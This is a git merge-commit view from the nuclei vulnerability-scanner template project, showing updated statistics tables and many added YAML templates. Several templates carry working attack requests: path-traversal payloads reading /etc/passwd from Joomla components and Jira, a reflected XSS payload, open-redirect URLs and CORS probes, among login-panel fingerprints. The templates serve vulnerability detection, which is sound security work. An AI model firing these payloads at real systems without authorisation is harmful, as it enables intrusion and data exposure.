Merge remote-tracking branch 'origin' into dynamic_attributes

patch-1
forgedhallpass 2021-08-26 15:04:14 +03:00
commit a4250b8f2f
29 changed files with 1257 additions and 761 deletions

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 624 | pikpikcu | 243 | cves | 631 | info | 592 | http | 1785 |
| panel | 222 | dhiyaneshdk | 240 | vulnerabilities | 281 | high | 504 | file | 46 |
| xss | 221 | pdteam | 196 | exposed-panels | 225 | medium | 398 | network | 38 |
| exposure | 212 | daffainfo | 160 | exposures | 182 | critical | 230 | dns | 11 |
| wordpress | 203 | geeknik | 149 | technologies | 160 | low | 161 | | |
| lfi | 203 | dwisiswant0 | 131 | misconfiguration | 125 | | | | |
| rce | 189 | gy741 | 71 | takeovers | 71 | | | | |
| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 |
| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 |
| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 |
| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 |
| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | |
| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
| rce | 189 | gy741 | 72 | takeovers | 71 | | | | |
| cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | |
| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | |
| cve2021 | 103 | pussycat0x | 42 | workflows | 35 | | | | |
| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | |
| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | |
**146 directories, 1940 files**.
**146 directories, 1962 files**.
</td>
</tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 624 | pikpikcu | 243 | cves | 631 | info | 592 | http | 1785 |
| panel | 222 | dhiyaneshdk | 240 | vulnerabilities | 281 | high | 504 | file | 46 |
| xss | 221 | pdteam | 196 | exposed-panels | 225 | medium | 398 | network | 38 |
| exposure | 212 | daffainfo | 160 | exposures | 182 | critical | 230 | dns | 11 |
| wordpress | 203 | geeknik | 149 | technologies | 160 | low | 161 | | |
| lfi | 203 | dwisiswant0 | 131 | misconfiguration | 125 | | | | |
| rce | 189 | gy741 | 71 | takeovers | 71 | | | | |
| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 |
| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 |
| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 |
| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 |
| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | |
| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
| rce | 189 | gy741 | 72 | takeovers | 71 | | | | |
| cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | |
| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | |
| cve2021 | 103 | pussycat0x | 42 | workflows | 35 | | | | |
| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | |
| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | |

View File

@ -0,0 +1,27 @@
id: CVE-2010-1306
info:
name: Joomla! Component Picasa 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12058
- https://www.cvedetails.com/cve/CVE-2010-1306
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1954
info:
name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12287
- https://www.cvedetails.com/cve/CVE-2010-1954
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,33 @@
id: CVE-2018-12095
info:
name: OEcms 3.1 - Cross-Site Scripting
author: LogicalHunter
severity: medium
description: A Reflected Cross-Site Scripting web vulnerability has been discovered in the OEcms v3.1 web-application. The vulnerability is located in the mod parameter of info.php.
reference:
- https://www.exploit-db.com/exploits/44895
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095
- https://cxsecurity.com/issue/WLB-2018060092
tags: cve,cve2018,xss
requests:
- method: GET
path:
- '{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -2,7 +2,7 @@ id: CVE-2019-15501
info:
name: LSoft ListServ - XSS
author: Borna Nematzadeh
author: LogicalHunter
severity: medium
reference:
- https://www.exploit-db.com/exploits/47302

View File

@ -2,7 +2,7 @@ id: CVE-2019-8937
info:
name: HotelDruid 2.3.0 - XSS
author: Borna Nematzadeh
author: LogicalHunter
severity: medium
refrense: https://www.exploit-db.com/exploits/46429
tags: cve,cve2019,xss,hoteldruid

View File

@ -0,0 +1,29 @@
id: CVE-2021-26086
info:
name: Jira Limited Local File Read
author: cocxanh
severity: medium
description: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.
reference:
- https://jira.atlassian.com/browse/JRASERVER-72695
- https://nvd.nist.gov/vuln/detail/CVE-2021-26086
tags: cve,cve2021,jira,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<web-app"
- "</web-app>"
part: body
condition: and

View File

@ -17,17 +17,20 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}/login/showlogin"
- "{{BaseURL}}"
headers:
Host: "{{randstr}}.tld"
matchers-condition: and
matchers:
- type: regex
regex:
- (EXPONENT\.(?:(?:J(?:QUERY|S)_UR|URL_FUL)|YUI2_UR)L=")?https?://{{randstr}}\.tld
- type: word
words:
- '{{randstr}}.tld'
- 'EXPONENT.PATH'
- 'EXPONENT.URL'
part: body
condition: and
- type: status
status:

View File

@ -1,4 +1,4 @@
id: can-i-take-over-dns
id: can-i-take-over-dns-fingerprint
info:
name: Can I Take Over DNS - Fingerprint

View File

@ -0,0 +1,32 @@
id: epson-unauthorized-access-detect
info:
name: Epson Printer
author: pussycat0x
severity: medium
reference: https://www.exploit-db.com/ghdb/6922
tags: iot,printer,panel,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/PRESENTATION/EPSONCONNECT"
matchers-condition: and
matchers:
- type: word
words:
- "Epson Connect"
- "/IMAGE/EPSONLOGO.PNG"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- "<title>([A-Z-0-9]+) Series</title>"

View File

@ -0,0 +1,25 @@
id: epson-web-control-detect
info:
name: Epson Printer
author: pussycat0x
severity: info
reference: https://www.exploit-db.com/ghdb/6873
tags: iot,printer,panel,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/home"
matchers-condition: and
matchers:
- type: word
words:
- "Epson Web Control"
- "Basic Control"
- "Advanced"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,23 @@
id: honeywell-web-controller
info:
name: Honeywell XL Web Controller
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7130
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}/standard/default.php'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Honeywell XL Web Controller</title>'
- type: status
status:
- 200

View File

@ -0,0 +1,23 @@
id: ibm-note-login
info:
name: IBM iNotes Login
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7122
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/names.nsf'
matchers-condition: and
matchers:
- type: word
words:
- '<title>IBM iNotes Login</title>'
- type: status
status:
- 200

View File

@ -0,0 +1,31 @@
id: lacie-panel
info:
name: LaCie Login Panel
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7118
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/dashboard/'
matchers-condition: and
matchers:
- type: word
words:
- 'id_LaCie'
part: body
- type: regex
regex:
- '(?m)<title>([a-zA-Z0-9&#; ]|)+Dashboard<\/title>$'
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,22 @@
id: web-service-panel
info:
name: WEB SERVICE Panel
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7116
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- '<title>WEB SERVICE</title>'
- type: status
status:
- 200

View File

@ -0,0 +1,30 @@
id: axis-happyaxis
info:
name: Axis Happyaxis Exposure
author: dogasantos
severity: info
tags: axis,axis2,middleware,exposure,apache
requests:
- method: GET
path:
- "{{BaseURL}}/axis2/axis2-web/HappyAxis.jsp"
- "{{BaseURL}}/axis/happyaxis.jsp"
- "{{BaseURL}}/axis2-web/HappyAxis.jsp"
- "{{BaseURL}}/happyaxis.jsp"
matchers-condition: and
matchers:
- type: word
words:
- "Axis Happiness Page"
- "Axis2 Happiness Page"
- "Examining Application Server"
- "Examining Version Service"
- "Examining System Properties"
condition: or
- type: status
status:
- 200

View File

@ -0,0 +1,33 @@
id: glpi-status-domain-disclosure
info:
name: GLPI Status Domain Disclosure
author: dogasantos
severity: info
tags: glpi,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/status.php"
- "{{BaseURL}}/glpi/status.php"
- "{{BaseURL}}/glpi2/status.php"
matchers-condition: and
matchers:
- type: word
words:
- "GLPI_"
- "LDAP server"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '((\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})|([a-zA-Z0-9]+(\.[a-zA-Z0-9]{2,3}){1,2}))'

View File

@ -0,0 +1,25 @@
id: glpi-telemetry-disclosure
info:
name: GLPI Telemetry Disclosure
author: dogasantos
severity: info
tags: glpi,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/ajax/telemetry.php"
- "{{BaseURL}}/glpi/ajax/telemetry.php"
matchers-condition: and
matchers:
- type: word
words:
- '"uuid":'
- '"glpi":'
condition: and
- type: status
status:
- 200

View File

@ -1,9 +1,9 @@
id: ftp-default-credentials
info:
name: FTP Service with default credentials
name: FTP Service with anonymous Login
author: pussycat0x
severity: low
severity: info
tags: network,ftp,default-login
network:
@ -18,3 +18,5 @@ network:
- type: word
words:
- "230"
- "Anonymous user logged in"
condition: and

View File

@ -0,0 +1,31 @@
id: apache-axis-detect
info:
name: apache-axis-detect
author: dogasantos
severity: info
description: Axis and Axis2 detection
tags: tech,axis2,middleware,apache
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/axis2/"
- "{{BaseURL}}/axis/"
matchers-condition: and
matchers:
- type: word
words:
- "Validate"
- "Welcome"
- "Axis"
- "deployed"
- "installation"
- "Admin"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: glpi-cms-detect
info:
name: GLPI Cms Detection
author: dogasantos
severity: info
tags: glpi,cms,php
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/glpi/"
- "{{BaseURL}}/glpi2/"
matchers-condition: and
matchers:
- type: word
words:
- "CFG_GLPI"
- "_glpi_csrf_token"
- "GLPI Copyright"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,23 @@
id: synology-web-station
info:
name: Synology Web Station
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7125
tags: tech
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Hello! Welcome to Synology Web Station!</title>'
- type: status
status:
- 200

View File

@ -1,22 +0,0 @@
id: basic-cors-misconfig
info:
name: Basic CORS misconfiguration
author: nadino
severity: info
tags: cors,generic
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
Origin: https://evil.com
matchers:
- type: word
words:
- "Access-Control-Allow-Origin: https://evil.com"
- "Access-Control-Allow-Credentials: true"
condition: and
part: header

View File

@ -0,0 +1,66 @@
id: cors-misconfig
info:
name: Basic CORS misconfiguration
author: nadino,G4L1T0,convisoappsec,pdteam
severity: info
reference: https://portswigger.net/web-security/cors
tags: cors,generic
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET / HTTP/1.1
Host: {{Hostname}}
Origin: {{randstr}}.com
- |
GET / HTTP/1.1
Host: {{Hostname}}
Origin: null
# - |
# GET / HTTP/1.1
# Host: {{Hostname}}
# Origin: {{randstr}}.{{Hostname}}
#
# - |
# GET / HTTP/1.1
# Host: {{Hostname}}
# Origin: {{Hostname}}{{randstr}}
# TO DO for future as currently {{Hostname}} is not supported in matchers
matchers-condition: or
matchers:
- type: dsl
name: arbitrary-origin
dsl:
- "contains(tolower(all_headers), 'access-control-allow-origin: {{randstr}}.com')"
- "contains(tolower(all_headers), 'access-control-allow-credentials: true')"
condition: and
- type: dsl
name: null-origin
dsl:
- "contains(tolower(all_headers), 'access-control-allow-origin: null')"
- "contains(tolower(all_headers), 'access-control-allow-credentials: true')"
condition: and
- type: dsl
name: wildcard-acac
dsl:
- "contains(tolower(all_headers), 'access-control-allow-origin: *')"
- "contains(tolower(all_headers), 'access-control-allow-credentials: true')"
condition: and
- type: dsl
name: wildcard-no-acac
dsl:
- "contains(tolower(all_headers), 'access-control-allow-origin: *')"
- "!contains(tolower(all_headers), 'access-control-allow-credentials: true')"
condition: and

View File

@ -21,7 +21,7 @@ requests:
- '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com'
- '{{BaseURL}}bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
matchers-condition: and

View File

@ -21,6 +21,8 @@ requests:
words:
- 'sqli-test'
- 'attribute_counts'
- 'price_range'
- 'term'
condition: and
- type: word